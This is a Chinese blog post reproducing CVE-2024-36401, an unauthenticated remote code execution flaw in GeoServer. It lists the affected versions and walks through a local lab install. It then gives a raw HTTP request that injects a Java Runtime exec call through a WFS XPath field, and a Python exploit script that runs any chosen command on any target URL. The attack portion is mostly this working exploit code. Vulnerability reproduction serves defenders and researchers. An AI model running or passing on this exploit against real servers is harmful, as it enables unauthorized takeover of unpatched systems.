【漏洞复现】CVE-2024-36401 Geoserver远程代码执行漏洞复现

已于 2024-12-20 12:44:53 修改
阅读量2.3k 收藏 10
点赞数 6
分类专栏: 漏洞复现 文章标签: CVE-2024-36401 1024程序员节
于 2024-10-24 11:18:16 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_44159028/article/details/143204231
版权

目录

CVE-2024-36401 Geoserver远程代码执行漏洞

影响版本

环境搭建

漏洞复现

poc

GeoServer是一个用Java编写的开源软件服务器,允许用户共享和编辑地理空间数据。它为提供交互操作性而设计,使用开放标准发布来自任何主要空间数据源的数据。

CVE-2024-36401 Geoserver远程代码执行漏洞复现

CVE-2024-36401 Geoserver远程代码执行漏洞

GeoServer存在远程代码执行漏洞(CVE-2024-36401),未经身份认证的远程攻击者可以通过该漏洞在服务器上执行任意代码,从而获取服务器权限。

影响版本

  • GeoServer < 2.23.6
  • 2.24.0 <= GeoServer < 2.24.4
  • 2.25.0 <= GeoServer < 2.25.2

环境搭建

显示要 java11 或者 17 环境

点击 Windows Installer 下载

开始安装,选择 jdk 路径

选择安装模式,第一个是以低权限的网络用户运行 Geoserver,第二个是以当前用户 administrator 权限运行。为了方便漏洞演示,选择第二个

安装完后进入如下目录启动 Geoserver

输入 http://127.0.0.1:8080/geoserver 进入 GeoServer 的管理员界面。

漏洞复现

poc,执行的命令为弹出计算器

POST /geoserver/wfs HTTP/1.1
Host: 192.168.67.158:8080
Accept-Encoding: gzip, deflate, br
Accept: */*
Accept-Language: en-US;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.6367.118 Safari/537.36
Connection: close
Cache-Control: max-age=0
Content-Type: application/xml
Content-Length: 341

<wfs:GetPropertyValue service='WFS' version='2.0.0'
 xmlns:topp='http://www.openplans.org/topp'
 xmlns:fes='http://www.opengis.net/fes/2.0'
 xmlns:wfs='http://www.opengis.net/wfs/2.0'>
  <wfs:Query typeNames='sf:archsites'/>
  <wfs:valueReference>exec(java.lang.Runtime.getRuntime(),"calc")</wfs:valueReference>
</wfs:GetPropertyValue>

执行后

poc

使用:CVE-2024-36401.py http://192.168.67.158:8080 calc

import sys
import requests

#proxy={'http': 'http://127.0.0.1:8080', 'https': 'http://127.0.0.1:8080'}
proxy = None

def send_post_request(url, command):
    data = """<wfs:GetPropertyValue service='WFS' version='2.0.0'
 xmlns:topp='http://www.openplans.org/topp'
 xmlns:fes='http://www.opengis.net/fes/2.0'
 xmlns:wfs='http://www.opengis.net/wfs/2.0'>
  <wfs:Query typeNames='sf:archsites'/>
  <wfs:valueReference>exec(java.lang.Runtime.getRuntime(),"%s")</wfs:valueReference>
</wfs:GetPropertyValue>
""" % command
    
    host = url.replace('http://', '').replace('https://', '').rstrip('/')
    headers = {
        'Host': '%s' % host,
        'Accept-Encoding': 'gzip, deflate, br',
        'Accept': '*/*',
        'Accept-Language': 'en-US;q=0.9,en;q=0.8',
        'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.6367.118 Safari/537.36',
        'Connection': 'close',
        'Cache-Control': 'max-age=0',
        'Content-Type': 'application/xml',
        'Content-Length': str(len(data))  # 数据长度
    }
    try:
        response = requests.post(url+'/geoserver/wfs', data=data, headers=headers, proxies=proxy, timeout=15)
        if response.status_code == 400 and 'java.lang.ClassCastException' in response.text:
            print('[*]漏洞利用成功')
            print('响应码:%s' % response.status_code)
            print('响应体:\n%s' % response.text)

    except requests.exceptions.RequestException as e:
        print(f"An error occurred: {e}")

if __name__ == "__main__":
    if len(sys.argv) != 3:
        print("Usage: python3 poc.py <url> <command>")
        sys.exit(1)

    url = sys.argv[1]
    command = sys.argv[2]

    print('CVE-2024-36401 Geoserver远程代码执行漏洞EXP')
    send_post_request(url.rstrip('/'), command)

Geoserver XPath表达式注入致远程代码执行漏洞复现(CVE-2024-36401)
0xSec
07-03 2248
2024年7月,互联网上披露Geoserver表达式注入致远程代码执行漏洞CVE-2024-36401),攻击者无需认证即可利用该漏洞获取服务器权限,建议受影响的客户尽快修复漏洞
GeoServer 属性名表达式前台代码执行漏洞CVE-2024-36401
4SecNet团队专栏
09-29 368
GeoServer是一个开源服务器,用于共享、处理和编辑地理空间数据。它支持多种地图和数据标准,使用户能够通过网络访问和操作地理信息系统(GIS)数据,遵循OGC开放标准的开源WFS-T和WMS服务器。在GeoServer 2.25.1, 2.24.3, 2.23.5版本及以前,未登录的任意用户可以通过构造恶意OGC请求,在默认安装的服务器中执行XPath表达式,进而利用执行Apache Commons Jxpath提供的功能执行任意代码。nuclei格式检测规则。python脚本扫描。
漏洞复现Geoserver远程代码执行漏洞CVE-2024-36401
今天是几号的博客
07-03 3789
GeoServer已经发布先前版本的补丁,可以从下载页面(https://geoserver.org/)下载:2.25.1、2.24.3、2.24.2、2.23.2、2.21.5、2.20.7、2.20.4、2.19.2、2.18.0,从下载的补丁中获取gt-app-schema和gt-complex和 gt-xsd-core jar文件,替换掉WEB-INF/lib里面对应的文件即可。它为提供交互操作性而设计,使用开放标准发布来自任何主要空间数据源的数据。
未公开 GeoServer开源服务器wfs远程命令执行漏洞复现(CVE-2024-36401)
小司机的奥拓
07-03 1246
资源分享包含但不限于网上未公开的day漏洞(更新漏洞POC共500+),2024最新企业SRC/CNVD/Edu实战挖掘技巧报告,红队内网横向渗透,代码审计,JS逆向,SRC培训等课程。
1day 【漏洞复现 | 成功上传Webshell】Geoserver 任意文件上传(CVE-2023-51444),从零基础到精通,收藏这篇就够了!_ureport-cve-2023-24187任意
最新发布
bdfcfff77fa的博客
03-14 936
GeoServer 是一个用 Java 编写的开源软件服务器,允许用户共享和编辑地理空间数据。
GeoServer CVE-2024-36401 漏洞利用
泷羽Sec-静安
08-16 3009
GeoServer 2.25.1, 2.24.3, 2.23.5版本及以前,未登录的任意用户可以通过构造恶意OGC请求,在默认安装的服务器中执行XPath表达式,进而利用执行Apache Commons Jxpath提供的功能执行任意代码。GeoServer 是 OpenGIS Web 服务器规范的 J2EE 实现,利用 GeoServer 可以方便的发布地图数据,允许用户对特征数据进行更新、删除、插入操作。中数字的长度要和命令的字节数等于或大于才能执行成功,越大执行越慢。的报错是成功执行的。
GeoServer远程代码执行漏洞复现(CVE-2024-36401)
qq_26229345的博客
07-08 8187
文章仅供参考,本文所提供的信息只为网络安全人员对自己所负责的网站、服务器等进行检测或维护参考,未经授权请勿利用文章中的技术资料对任何计算机系统进行入侵操作。利用此文所提供的信息而造成的直接或间接后果和损失,均由使用者本人负责!
CVE-2024-23692:Rejetto HFS 2.x 远程代码执行漏洞[附POC]
薛定谔嘚喵博客
06-14 2261
Rejetto HTTP文件服务器是一个轻量级的HTTP服务器软件,它允许用户在本地计算机上快速搭建一个文件共享服务。2024年6月,互联网上披露其 2.x系列 存在CVE-2024-23692 远程代码执行漏洞,该漏洞源于存在模板注入漏洞,允许远程未经身份验证的攻击者通过发送特制的HTTP请求在受影响的系统上执行任意命令。
【靶机实战】GeoServer 远程代码执行漏洞复现
qq_21039641的博客
07-10 1948
CVE-2024-36401是一个高危的远程代码执行漏洞,存在于GeoServer软件中。GeoServer是一个用Java编写的开源服务器,用于共享和编辑地理空间数据。该漏洞允许未经身份验证的远程攻击者通过构造特定的请求,在服务器上执行任意代码,从而可能获取服务器的控制权。这个漏洞2024年7月2日被公开,影响多个版本的GeoServer,包括2.24.0至2.24.3以及2.25.0至2.25.1。
GeoServer之xpath表达式远程代码执行CVE-2024-36401漏洞复现及分析
bring_coco的博客
11-15 904
比如GetPropertyValue(获取属性值),GetFeatureWithLock(获取带锁特征),CreateStoredQuery(创建存储查询),DropStoredQuery(删除存储查询),ListStoredQueries(列出已存储的查询),DescribeStoredQuery(描述存储查询)尽管版本之间存在一些重要差异,但请求语法通常保持不变。检查缓存中是否存在xpath已编译的表达式,如果 expr 不为 null,表示缓存中已存在已编译的表达式,直接返回该表达式,否则会编译。
Geoserver漏洞复现
2301_80115097的博客
04-23 2186
(https://github.com/geoserver/geoserver/)获取2.23.4或2.24.1及以上的版本修复漏洞。官网:https://sourceforge.net/projects/geoserver/files/GeoServer/下载地址:https://github.com/geoserver/geoserver/releases。仓库托管地址:https://github.com/geoserver/geoserver。默认账号密码:admin/geoserver
CVE-2024-GeoServer JXPath远程代码执行漏洞
Lucker_YYY的博客
08-18 483
近日,微步漏洞团队获取到GeoServer JXPath远程代码执行漏洞情报(https://x.threatbook.com/v5/vul/XVE-2024-16055)。文中所涉及的技术、思路及工具等相关知识仅供安全为目的的学习使用,任何人不得将其应用于非法用途及盈利等目的,间接使用文章中的任何工具、思路及技术,我方对于由此引起的法律后果概不负责。本文发布的工具和脚本,仅用作测试和学习研究,禁止用于商业用途,不能保证其合法性,准确性,完整性和有效性,请根据情况自行判断。是否需要绕过安全机制。
1day 【漏洞复现 | 成功上传Webshell】Geoserver 任意文件上传(CVE-2023-51444),从零基础到精通,收藏这篇就够了!
Python_0011的博客
03-07 651
请勿利用文章内的相关技术从事非法测试,由于传播、利用此文所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,作者不为此承担任何责任。本次测试仅供学习使用,如若非法他用,与平台和本文作者无关,需自行负责!未经授权,严禁转载,如需转载,联系小明信安公众号。这也是耗费了大白近四个月的时间,吐血整理,文章非常非常长,觉得有用的话,希望粉丝朋友帮忙点个**「分享」下面的连接参数选项,需要选择绝对路径,以这个镜像为例,点击浏览,目录选择。注意两个test,前面的是工作空间,后面的是存储仓库。
GeoServer /geoserver/wms RCE漏洞复现(CVE-2022-24816)
0xSec
05-15 2565
GeoServer /geoserver/wms 接口处存在远程代码执行漏洞,未经身份验证的远程攻击者可利用此漏洞执行任意shell命令,从而获取服务器权限。
漏洞复现-GeoServer 远程代码执行漏洞CVE-2024-36401
玄道的网安博客
08-12 1050
受影响的版本中,未登录的任意用户可以通过构造恶意OGC请求,在默认安装的服务器中执行XPath表达式,进而利用执行Apache Commons Jxpath提供的功能执行任意代码。GeoServer 是 OpenGIS Web 服务器规范的 J2EE 实现,利用 GeoServer 可以方便的发布地图数据,允许用户对特征数据进行更新、删除、插入操作。将geoserver平台升级到最新版。
GeoServer property 表达式注入代码执行漏洞(CVE-2024-36401)
huangyongkang666的博客
07-10 1150
GeoServer安装的特别构造的输入利用代码注入漏洞,该漏洞是由于应用不安全地将属性名称作为XPath表达式进行评估,攻击者可以在默认安装的服务器中执行XPath表达式,进而利用执行Apache Commons Jxpath提供的功能执行任意代码。
0Day漏洞防御篇:GeoServer CVE-2024-36401远程代码执行漏洞
weixin_55163056的博客
07-08 1041
高危漏洞预警
GeoServer SQL 注入漏洞复现CVE-2023-25157)附poc
网络安全爱好者,分享渗透测试、漏洞复现、src挖掘,靶场搭建知识和技巧
12-23 6106
GeoServer是OpenGIS Web 服务器规范的 J2EE 实现,利用 GeoServer 可以方便的发布地图数据,允许用户对特征数据进行更新、删除、插入操作,通过 GeoServer 可以比较容易的在用户之间迅速共享空间地理信息。在2.22.1和2.21.4之前版本中,在开放地理空间联盟(OGC)标准定义的过滤器和函数表达式中发现了一个SQL注入问题,未经身份验证的攻击者可以利用该漏洞进行SQL注入,执行恶意代码。
CVE-2024-6387: OpenSSH 远程代码执行漏洞
12-27
### CVE-2024-6387 OpenSSH 远程代码执行漏洞详细信息 CVE-2024-6387 是一个存在于 OpenSSH 服务器中的高危远程代码执行 (RCE) 漏洞,允许未经身份验证的远程攻击者在受影响的 Linux 系统上以 root 权限执行任意代码。此漏洞源于信号处理程序中存在的条件竞争问题[^2]。 #### 影响范围 该漏洞主要影响基于 glibc 的 Linux 系统,并且特定版本范围内存在风险: - **OpenSSH 版本**:< 4.4p1 和 8.5p1 ≤ OpenSSH < 9.8p1 的版本受到影响。 由于漏洞细节和技术利用方法已在互联网上公开传播,因此其潜在威胁显著增大。 ### 修复方案 为了防止因 CVE-2024-6387 导致的安全事件发生,建议采取如下措施: 1. **立即升级到最新版 OpenSSH** 推荐尽快将 OpenSSH 升级至官方发布的最新稳定版本(至少为 9.8p1 或更高),这些新版本已包含针对该漏洞的有效修补程序。 2. **应用安全补丁** 如果无法即时进行全面升级,则应安装由操作系统供应商提供的专门用于解决此问题的安全更新包。 3. **配置防火墙规则** 可通过设置严格的网络访问控制策略来限制对 SSH 服务端口(默认为 TCP/22)不必要的外部连接请求,从而减少被攻击的风险[^3]。 4. **启用强制密钥认证机制** 关闭密码登录方式并仅允许使用强加密算法保护下的公私钥配对方式进行用户鉴权操作可以进一步增强系统的安全性。 ```bash # 修改 /etc/ssh/sshd_config 文件,禁用密码登陆并将 PubkeyAuthentication 设置为 yes PasswordAuthentication no PubkeyAuthentication yes ```
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

Ly4j

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值